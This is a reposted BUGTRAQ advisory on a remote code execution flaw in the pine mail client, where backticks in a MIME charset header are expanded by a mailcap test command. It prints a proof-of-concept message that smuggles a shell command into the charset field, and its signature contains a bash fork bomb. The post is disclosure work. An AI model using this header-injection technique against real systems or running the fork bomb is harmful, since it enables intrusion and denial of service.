Michal Zalewski posts to BUGTRAQ: Affected systems: ----------------- Any Un*x system running 'pine' up to version 4.10 (latest). Compromise: ----------- Remote execution of arbitrary code when message is viewed. Details: -------- About five months ago, I reported vunerability in metamail package used with pine. I also noticed that '`' character is incorrectly expanded by pine. Problem has been ignored (probably noone understood what I am talking about?;-). But no matter. An exception from /etc/mailcap: text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput Impact: ------- And now, ladies and gentelmen - my old bug, reinvented. Usually, above mailcap line is expanded to: [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) Hmm, but take a look at this message: ************************** MIME MESSAGE FOLLOWS ************************** From: Attacker <attacker@eleet.net> To: Victim <victim@somewhere.net> Subject: Happy birthday ... MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319" --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset='US-ASCII' Make a wish... --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c" Content-Transfer-Encoding: BASE64 Content-Description: wish Content-Disposition: attachment; filename="wish.c" ...it could be your last. *************************** MIME MESSAGE ENDS *************************** The result is: [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is executed when message is viewed. Fix: ---- Well, it's the second time I report problems with ` in headers. Maybe pine developers should wait a little longer ;-) ___________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM] [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
Remote exploit for pine available
By
Get the Free Newsletter!
Subscribe to Developer Insider for top news, trends, & analysis